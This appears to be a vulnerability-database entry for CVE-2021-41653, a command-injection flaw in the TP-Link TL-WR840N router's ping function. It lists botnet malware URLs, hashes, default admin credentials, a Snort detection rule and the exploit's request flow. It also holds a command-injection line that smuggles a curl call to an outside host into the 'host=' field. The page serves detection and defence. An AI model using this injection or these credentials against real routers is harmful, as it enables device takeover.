cbcvebase.
CVE-2021-41653
published 2021-11-13

CVE-2021-41653: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted…

PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
77.47%
99.5th percentile
The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.

Affected

1 ranges
VendorProductVersion rangeFixed in
tp-linktl-wr840n_firmware<= tl-wr840n\(eu\)_v5_171211

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://194.85.248.176/bins/eh.x86
urlhttp://194.85.248.176/bins/eh.mips
urlhttp://194.85.248.176/bins/eh.mpsl
urlhttp://194.85.248.176/bins/eh.arm4
urlhttp://194.85.248.176/bins/eh.arm5
urlhttp://194.85.248.176/bins/eh.arm6
urlhttp://194.85.248.176/bins/eh.arm7
urlhttp://194.85.248.176/bins/eh.ppc
urlhttp://194.85.248.176/bins/eh.m68k
urlhttp://194.85.248.176/bins/eh.sh4
urlhttp://194.85.248.176/bins/eh.86_64
urlhttp://194.85.248.176/local.sh
urlhttp://194.85.248.176/tshit.sh
urlhttp://2.56.59.215/apache2.sh
urlhttp://212.192.241.72/lolol.sh
ip194.85.248.176
ip2.56.59.215
ip212.192.241.72
filenametshit.sh
hashebfc95372427f8b845daff9ff4aebe2451fa78e35a24edd084685f06ba3daee4
hash57f50f34e6df8ee9006e46b5fe5c4ee11febe9e33b087c809f1384563e9f1d4e
hash8ebef715ddb0b4e973b2f8c7529f4480b5caa9c4a25f8fd05a7eaacf036cca20
hash113be1f9db8af2469b82ce1b5d1b0c61c50586567b3898f2b8a614cd6e8f47a8
hashb4c3c79d148db638f891143a1910c3d17f973c512a719b1f7525a823b14d29a8
hashd3928d0b6dedce6a083123028e50ba76e1b29666e70a96eec1a7061b7303bf1a
hash6b463e9f5d9e8edbc235bceb854367b26ed6effb0dee9881a4f4e88a967318d5
hashd88052c0a76cac7e571870a4e87c5354594c26b4955cd934870dc12d48f129d5
hash265396023cbbad6b3480b851873ece9fa2f32c63739a7a0ac32d196843080cc8
hash83566400bdb09c5e2438c0d9ff723c88328ca93f29e648f97088342e239bfa09
hashaf9ac01e9e8cf7064d590044df43adca566521d223662cf5e0e2500badff6998
hashde01f26209a085eeff8c217782d283640a6226ccf1bd27eefd696658b55d10ba
hasha4b16a5bf9b6e662050a3c5ff157d7b2f0be301a1f8f5d1359170132b8b22e58
hash7a47e5b83e3c42df2ab72adf4a041b2e382f61a0ff378f593156353a78c2c702
hash1bd895ed050ce42d0f39b6baa0b6a454e05eb5bff72290857cb8fb77a9e4b4b9
hash71ca57bbba49aa877f7ded340328342c6e82e3a99720734c8b0de150d44d906c
hash23b03aa7d1dadd2e71016702f3e1b278b3a2c4f0c7d0cdc272774a428b88d09c
hashfb7b03e7619d3ac5c4cbadc6b38841b11e3b19214b776073a590b571f91fe51e
hash3c978e02d21c7c12631d56c41aceb305fc11348a53eed47e29f7ce62ea0da4df
hash4832cff5666433a784d6ba48a0e400367d25314ef15d08a216b6286226eff342
hash95e4ac3ae03646cda56d80df80d775ed4bf23f98be42274fb440e7bc0d03ce88
hash8d390ad5af8d70692bda123b96e9745816ec7893d84682adb6d243619538b9d3
hash66adea50e0de8e1d664bb18c9f80596d1443b90e9ba57a59425720886a0c97e0
hasha87b502575d0db1b6257f1cf75edf4894bc84598f79148525b5cc449d143a495
cookieAuthorization=Basic YWRtaW46YWRtaW4=
path/cgi?2
path/cgi?7
commandhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')
snort
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT TP-Link TL-WR840N EU v5 RCE Attempt (CVE-2021-41653)"; flow:established,to_server; http.request_line; content:"POST /cgi?2"; startswith; fast_pattern; http.request_body; content:"|5b|IPPING|5f|DIAG|23|"; nocase; content:"host="; distance:0; nocase; pcre:"/^(?:[\x60\x3b\x7c]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/R"; reference:url,k4m1ll0.com/cve-2021-41653.html; reference:url,www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability; reference:cve,2021-41653; classtype:attempted-admin; sid:2034677; rev:2; metadata:attack_target Networking_Equipment, created_at 2021_12_11, cve CVE_2021_41653, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_11;)
  • Exploit targets POST /cgi?2 endpoint with [IPPING_DIAG#...] body block containing a command-injected 'host=' parameter; a second follow-up request is sent to POST /cgi?7 to trigger execution.
  • The Snort/ET rule (sid:2034677) detects the exploit by matching 'POST /cgi?2' in the request line combined with '[IPPING_DIAG#' and 'host=' in the body, followed by shell metacharacters (backtick, semicolon, pipe, etc.) via PCRE.
  • Exploitation requires authentication; attackers use default credentials (admin:admin, Base64: YWRtaW46YWRtaW4=) in the Authorization cookie. Monitor for login attempts with default credentials followed by POST to /cgi?2.
  • The malicious dropper script is named 'tshit.sh'; its download and execution on a TP-Link router is a strong indicator of compromise. The script also blocks connections to commonly targeted ports to prevent competing botnets.
  • MANGA/Dark Mirai payload binaries use the naming pattern 'eh.<arch>' (e.g., eh.arm5, eh.mips, eh.x86) and 'Dark.<arch>' / 'dark.<arch>'. Presence of these filenames on a Linux/IoT device indicates infection.
  • FortiGuard IPS signatures 'TP-Link.HTTP.Management.Code.Execution' and 'TP-Link.Home.Wifi.Router.CGI.Referer.Command.Injection' can generically detect this attack class.
  • Check Point IPS signature 'TP-Link TL-WR840N Router Command Injection (CVE-2021-41653)' provides network-level detection.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.